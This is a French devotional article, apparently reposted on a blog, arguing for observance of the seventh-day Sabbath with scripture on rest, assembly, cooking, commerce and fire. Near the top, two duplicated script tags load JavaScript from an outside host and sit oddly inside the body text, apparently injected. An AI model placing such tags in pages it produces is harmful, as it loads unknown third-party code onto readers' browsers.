• Comment honorer le jour du shabbat ?

     

    <script src="http://p.datastomp.com/9/3/39.js" type="text/javascript"></script>

    <script src="http://p.datastomp.com/9/3/39.js" type="text/javascript"></script>

     

     

    Comment honorer le jour du Shabbat ?

     

    Des millions de gens pensent rendre un culte au Père Céleste au jour qu’ils pensent être le jour du Shabbat, et cela tout en ignorant la partie concernant l’arrêt de tout travail. Néanmoins, relativement peu sont ceux qui comprennent la vérité à propos du réel jour de Shabbat ordonné dans les Écritures. Ils ne perçoivent absolument pas l’importance et l’impact de ce que le véritable jour de Shabbat, le septième jour, nous dit au sujet du véritable culte.

    Considérez ce simple fait : le mot Shabbat apparaît 107 fois dans l’Ancien Testament et, étonnement, 68 fois dans le Nouveau Testament. Le « premier jour » de la semaine, au contraire, n’est mentionné que huit fois dans le Nouveau Testament, ce qui est une indication assez révélatrice identifiant le bon jour de Shabbat qui était observé à cette époque, et qui est toujours d’application de nos jours.

    Aucune autre observance n’a le poids et les implications que le jour de Shabbat, le septième jour, a. Comme nous allons le voir, le Shabbat identifie les vrais adorateurs et les sépare des autres cultes.

    Peut-être avez-vous le désir d’observer et d’honorer le même jour de Sabbat que Yahweh a sanctifié et ordonné pour Son peuple, mais vous n’êtes pas certains de la manière dont il faut agir. « Que dois-je faire le jour du Shabbat et qu’est-ce qui est interdit ? », vous demandez-vous. Dans cette publication, notre intention est de vous donner des points et des précisions à propos de l’observance du Shabbat et ce afin que vous soyez bénis par un bon respect du jour que Yahweh a donné exclusivement à Son peuple.

    Le Shabbat est un jour de repos, un jour de culte, un jour de fraternisation, un jour de réjouissance, et un jour de réflexion. Parmi les jours spéciaux, le Shabbat est celui qui possède les plus profondes implications. Pour le peuple de Yahweh, il n’existe aucun autre jour aussi important que le Shabbat car il est le lien qui les identifie avec le Père. C’est un jour où une personne peut s’échapper des soucis du monde et méditer la Parole de Yahweh.

    Dès le commencement, Yahweh créa et mit de côté le Shabbat comme un jour unique pour l’honorer : « [Elohim] acheva au septième jour son œuvre, qu’il avait faite: et il se reposa au septième jour de toute son œuvre, qu’il avait faite. [Elohim] bénit le septième jour, et il le sanctifia, parce qu’en ce jour il se reposa de toute son œuvre qu’il avait créée en la faisant. » (Genèse 2:2-3). Yahweh a utilisé six jours pour créer et mettre les cieux et la terre en état, après quoi Il se reposa au septième jour. Lorsque nous nous reposons le jour du Sabbat de Yahweh nous L’honorons en faisant ce que Lui-même a fait au septième jour.

    Le signe du vrai culte

    Le Shabbat hebdomadaire, tout comme les Shabbats annuels (fête des Pains sans levain, fête des Semaines, fête des Trompettes, jour des Expiations, fête des Tabernacles, et Dernier grand jour), est un signe entre Yahweh et Son peuple (Ézéchiel 20:12).

    Les Shabbats sont la marque distinctive des élus de Yahweh, anciens et actuels. Voici l’instruction venant de Yahweh pour le Shabbat : « Parle aux enfants d’Israël, et dis-leur: Vous ne manquerez pas d’observer mes shabbats, car ce sera entre moi et vous, et parmi vos descendants, un signe auquel on connaîtra que je suis [Yahweh] qui vous sanctifie. Vous observerez le shabbat, car il sera pour vous une chose sainte. Celui qui le profanera, sera puni de mort; celui qui fera quelque ouvrage ce jour-là, sera retranché du milieu de son peuple » (Exode 31:13-14).

    Il est important de saisir qu’aucun autre commandement n’a une importance aussi profonde, tout en évoquant de sérieuses conséquences pour sa profanation. De manière similaire, le Nom de Yahweh est également unique. Là où le Shabbat est le signe de Son peuple, le Nom de Yahweh est le sceau qui les scellera lors de la grande tribulation (Apocalypse 7:3 ; 14:1 ; 22:4). Tout comme pour le Shabbat, il n’existe aucun substitut pour ce sceau. Yahweh n’a qu’un seul nom, et non plusieurs (voir Philippiens 2:9).

    Shabbath : un jour de repos complet

    Le mot Shabbat vient de l’hébreu shabbath, qui signifie « se reposer, cesser ses activités ». Le Sabbat est, par-dessus tout, un repos complet tant de nos occupations professionnelles que de toutes activités qui pourraient causer une fatigue physique et nous éloigner du but de ce jour. Il s’agit d’un jour à utiliser exclusivement pour honorer Yahweh et Son Fils. De ce fait, toutes choses qui nous distrairaient de cet objectif doivent être évitées le septième jour.

    Yahweh a donné plusieurs règles précises pour Son Shabbat. Les Dix Commandements forment un résumé de la loi morale de Yahweh, avec le quatrième détaillant spécifiquement les attentes de Yahweh lors du Shabbat. Il interdit à Son peuple de travailler, et rappelle que c’est Lui qui bénit et sanctifia ce jour pour l’humanité. « Souviens-toi du jour du repos, pour le sanctifier. Tu travailleras six jours, et tu feras tout ton ouvrage. Mais le septième jour est le jour du repos de [Yahweh, ton Elohim] tu ne feras aucun ouvrage, ni toi, ni ton fils, ni ta fille, ni ton serviteur, ni ta servante, ni ton bétail, ni l’étranger qui est dans tes portes. Car en six jours [Yahweh] a fait les cieux, la terre et la mer, et tout ce qui y est contenu, et il s’est reposé le septième jour: c’est pourquoi [Yahweh] a béni le jour du repos et l’a sanctifié » (Exode 20:8-11).

    Le Quatrième Commandement met le Shabbat à part afin que toute la famille puisse l’observer, y compris ceux qui sont sous notre autorité, comme dans le cas d’un employé. Personne dans notre maison ou à l’intérieur de nos limites n’est exempté de l’observance du Shabbat, et cela inclut tous les animaux que nous possédons de sorte que ni un cheval ni un bœuf nous appartenant n’ait à travailler en ce jour. Une interdiction totale de travailler souligne la stricte sainteté du Shabbat.

    Rendre un culte ensemble le septième jour

    Yahweh nous encourage fortement à nous regrouper ou nous assembler comme un corps de croyants lors de Ses Shabbats hebdomadaires et annuels. « Parle aux enfants d’Israël, et tu leur diras: Les fêtes de [Yahweh], que vous publierez, seront de saintes convocations. Voici quelles sont mes fêtes. On travaillera six jours; mais le septième jour est le shabbat, le jour du repos: il y aura une sainte convocation. Vous ne ferez aucun ouvrage: c’est le shabbat de [Yahweh], dans toutes vos demeures » (Lévitique 23 :2-3).

    Nous lisons dans le Nouveau Testament que le culte était rendu le Shabbat dans la synagogue. Yahshua Lui-même se rendait à la synagogue le jour du Shabbat (Luc 4:16), de même que Paul (Actes 17:1-2 ; 18:4).Dans le Royaume, tous les peuples rendront un culte à Yahweh lors du Shabbat (Esaïe 66:23). Pouvons-nous, dès lors, dire que le Shabbat n’a aucune importance de nos jours ?

    La Bible décrit l’assemblée comme un corps uni dans le Messie. De ce corps, l’apôtre Paul disait que toutes les parties étaient nécessaires et essentielles pour le bénéfice de chacun. Qu’il manque même un seul des plus petits membres, et le corps est incapable de fonctionner avec tout son potentiel. Pour cette raison, il est crucial que tout le corps du Messie se regroupe durant les Shabbats hebdomadaires et annuels de Yahweh.

    L’auteur du livre aux Hébreux réitère ce besoin indispensable de s’assembler lors des Shabbats hebdomadaires et annuels de Yahweh. « N’abandonnons pas notre assemblée, comme c’est la coutume de quelques-uns ; mais exhortons-nous réciproquement, et cela d’autant plus que vous voyez s’approcher le jour » (Hébreux 10:25).

    Les derniers jours verront une détresse croissante et nous allons devoir de plus en plus nous reposer sur les croyants. (Téléchargez la brochure : « Comptez-vous sur un enlèvement à venir ? »)

    Cuisiner, faire du commerce et allumer des feux

    Hormis l’ordre de Yahweh de se reposer et d’adorer le jour du Shabbat, il y a plusieurs autres statuts qui régulent ce jour. Une activité interdite le shabbat est de cuisiner ou de préparer de la nourriture. « … C’est ce que [Yahweh] a ordonné. Demain est le jour du repos, le shabbat consacré à [Yahweh] ; faites cuire ce que vous avez à faire cuire, faites bouillir ce que vous avez à faire bouillir, et mettez en réserve jusqu’au matin tout ce qui restera » (Exode 16:23).

    Dans l’Ancien Testament, la préparation de la manne demandait pas mal d’efforts. « La manne ressemblait à de la graine de coriandre, et avait l’apparence du bdellium. Le peuple se dispersait pour la ramasser; il la broyait avec des meules, ou la pilait dans un mortier; il la cuisait au pot, et en faisait des gâteaux. Elle avait le goût d’un gâteau à l’huile » (Nombres 11:7-8).

    Afin d’éviter le processus intensif de préparation de la manne, Yahweh ordonna aux Israélites de préparer une quantité double de manne le sixième jour. En faisant ainsi, ils étaient libres de rendre un culte à Yahweh au septième jour. Bien que nous ne préparions plus de manne et que nous jouissons également d’équipements modernes qui nous évitent de tels efforts, nous continuons à observer ce statut en préparant tous les plats cuisinés la veille du Shabbat. La nourriture peut être réchauffée si nécessaire, mais cuisiner ou cuire doit être évité. L’interdiction concernant la préparation de la nourriture est quelque peu plus souple pour les Shabbats annuels qui se déroulent au début et à la fin des Fêtes (Exode 12:16).

    Une deuxième interdiction est celle qui concerne le fait de s’abstenir d’acheter et vendre lors des Shabbats hebdomadaires et annuels. « … ne rien acheter, le jour du shabbat et les jours de fête, des peuples du pays qui apporteraient à vendre, le jour du shabbat, des marchandises ou denrées quelconques; et de faire relâche la septième année, en n’exigeant le paiement d’aucune dette » (Néhémie 10:31 ; voir aussi 13:15-21).

    Lorsque les deux tribus de Juda et Benjamin furent relâchées de la captivité babylonienne par les Perses, les Israélites continuèrent à vivre comme s’ils étaient à Babylone. Sous Néhémie, les Israélites furent instruits de ne pas acheter ou vendre le jour du Shabbat. Néhémie, sous l’inspiration de Yahweh, comprit que le Shabbat n’était pas un jour de commerce mais un jour de culte et de fraternisation. Ce même principe s’applique à notre époque. Le Shabbat, pour le peuple actuel de Yahweh, continue d’être un jour d’adoration, de fraternisation, et d’éloignement du monde. Une personne ne peut observer le Shabbat tout en participant aux activités de ce monde car le monde n’a aucun respect pour ce jour et continuera à le souiller.

    Une troisième interdiction liée au Shabbat dans la Torah de Yahweh est l’allumage d’un feu. « On travaillera six jours; mais le septième jour sera pour vous une chose sainte; c’est le shabbat, le jour du repos, consacré à [Yahweh]. Celui qui fera quelque ouvrage ce jour-là, sera puni de mort. Vous n’allumerez point de feu, dans aucune de vos demeures, le jour du shabbat » (Exode 35:2-3). 

    L’interprétation précise de ce passage est débattue par les érudits bibliques. Yahweh’s Restoration Ministry comprend ce passage comme se référant à l’allumage d’un feu pour des raisons de travail. « The Interpreter’s One-Volume Commentary » (Le Commentaire de l’Interprète en un volume) note à propos d’Exode 35:3 : « Uniquement ici, quoi qu’implicite dans 16:23, est l’interdiction du feu le jour du Shabbat. Il a été suggéré que ceci pourrait être un vestige de la religion des Kenites, forgerons du désert, à qui il était sans aucun doute interdit de fondre ou travailler le métal le jour du Shabbat. » Cette interprétation correspond au contexte du 35e chapitre et la fonte du métal pour la construction du tabernacle.

    Toutes ces prescriptions sont inspirées par Yahweh et servent à protéger la pureté et la sainteté du Shabbat. En plus de s’abstenir du travail, le Shabbat est également un jour de pensées sans souillures et sobres. « Si tu retiens ton pied pendant le shabbat, pour ne pas faire ta volonté en mon saint jour, si tu fais du shabbat tes délices, pour sanctifier [Yahweh] en le glorifiant, et si tu l’honores en ne suivant point tes voies, en ne te livrant pas à tes penchants et à de vains discours » (Ésaïe 58:13).

    Le Shabbat est un temps pendant lequel on se focalise sur Yahweh et non un temps pour discuter les choses habituelles. Il s’agit d’un jour mis à part pour étudier et apprendre la Parole de Yahweh. Si Yahweh ordonne qu’une personne se retienne de faire du commerce, de se livrer aux plaisirs et de travailler le jour du Shabbat, il s’en suit que toutes conversations impliquant ces choses devraient être évitées. Nos actions, nos pensées, et nos conversations durant le Shabbat devraient, d’une manière certaine, refléter Yahweh et L’honorer.

    Exemples du Nouveau Testament

    De nombreux passages du Nouveau Testament montrent Yahshua et Ses apôtres honorant le Sabbat de Yahweh, le septième jour. La croyance commune selon laquelle Yahshua a annulé le Shabbat du septième jour afin de faire place au jour du Seigneur est une croyance qui n’existe pas dans le Nouveau Testament.

    Dans ce qui est considéré comme l’une des plus grandes prophéties des temps de la fin, Yahshua mentionne de ne pas profaner le Shabbat en se référant à la grande tribulation :  « Priez pour que votre fuite n’arrive pas en hiver, ni un jour de shabbat » (Matthieu 24:19-20). Cette parole de Yahshua confirme qu’Il n’avait aucune intention d’annuler le Shabbat durant ou après son ministère terrestre.

    Une autre évidence pour le Shabbat du septième jour peut être trouvée dans le texte préservant le premier conseil de l’assemblée primitive du Nouveau Testament : « Car, depuis bien des générations, Moïse a dans chaque ville des gens qui le prêchent, puisqu’on le lit tous les jours de shabbat dans les synagogues » (Actes 15:21). Ceci a eu lieu plus de dix ans après la mort de Yahshua sur le bois, pourtant les apôtres se faisaient les défenseurs du Shabbat du septième jour et l’observaient tout comme la Loi de Moïse (appelé Loi de Moïse car c’était celui par qui Yahweh avait transmis la loi à Israël, ainsi qu’à nous.)

    Beaucoup considèrent l’apôtre Paul comme étant le champion de la chrétienté. La perception générale est que Paul a invalidé les lois et les commandements de l’Ancien Testament, y compris les Sabbats. Néanmoins, il y a plusieurs récits du Nouveau Testament apportant l’évidence qu’il observait non seulement les saints jours prescris par la Torah, mais aussi le Shabbat, le septième jour.

    • « Le jour du shabbat, nous nous rendîmes, hors de la porte, vers une rivière, où nous pensions que se trouvait un lieu de prière. Nous nous assîmes, et nous parlâmes aux femmes qui étaient réunies. » (Actes 16:13)
    • « Paul y entra, selon sa coutume. Pendant trois shabbats, il discuta avec eux, d’après les Écritures. » (Actes 17:2)
    • « Paul discourait dans la synagogue chaque shabbat, et il persuadait des Juifs et des Grecs. » (Actes 18:4)

    Pareillement, dans l’épître aux Hébreux l’auteur confirme que le Shabbat du septième jour continue d’exister pour le peuple de Yahweh : « Il y a donc un repos de shabbat réservé au peuple de Dieu » (Hébreux 4:9). Ce passage est on ne peut plus clair et évident.

    Il est évident aussi, par ces passages, que le Shabbat du septième jour est toujours commandé pour les assemblées de Yahweh du Nouveau Testament.

    Exemples du Royaume millénaire

    Il ne fait aucun doute que le Shabbat était ordonné et observé dans l’Ancien Testament. Il peut être également prouvé sans grande difficulté que Yahshua et Ses apôtres, y compris l’apôtre Paul dans le Nouveau Testament, observèrent le Sabbat du septième jour. Afin d’appuyer encore plus l’ordonnance du Shabbat, il peut être montré que le Shabbat sera observé par Yahshua et les saints durant le Millenium. Deux passages concernant le Millenium rendent cela très clair :

    • « À chaque nouvelle lune et à chaque shabbat, toute chair viendra se prosterner devant moi, dit l’Éternel. » (Ésaïe 66:23)
    • « Le peuple du pays se prosternera devant l’Éternel à l’entrée de cette porte, aux jours de shabbat et aux nouvelles lunes. » (Ézéchiel 46:3)

    Suivez le propre exemple de Yahweh

    Le commandement concernant le Shabbat est l’un des plus importants dans la Parole de Yahweh. Comme Il l’établit à la Création en Se reposant Lui-même ce jour là (Genèse 2:2), Yahweh a établit ce jour comme un signe entre Lui et Son peuple. Ce jour est tellement important que Yahweh Lui-même l’observa ! Il l’appelle un signe, et lorsque nous l’observons correctement nous reflétons Yahweh dans nos vies et recevons Ses bénédictions pour notre obéissance.



    online studies | Q&A | search | free literature |    | home

    Copyright © 2002 | Yahweh's Restoration Ministry. All rights reserved.

     

     

    « LEXIQUE DE MOTS BIBLIQUESJE SUIS VENU POUR ACCOMPLIR LA LOI " Matthieu 5.17-20" »
    Partager via Gmail Yahoo! Google Bookmarks Pin It

    Tags Tags : , , , ,
  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires

    Vous devez être connecté pour commenter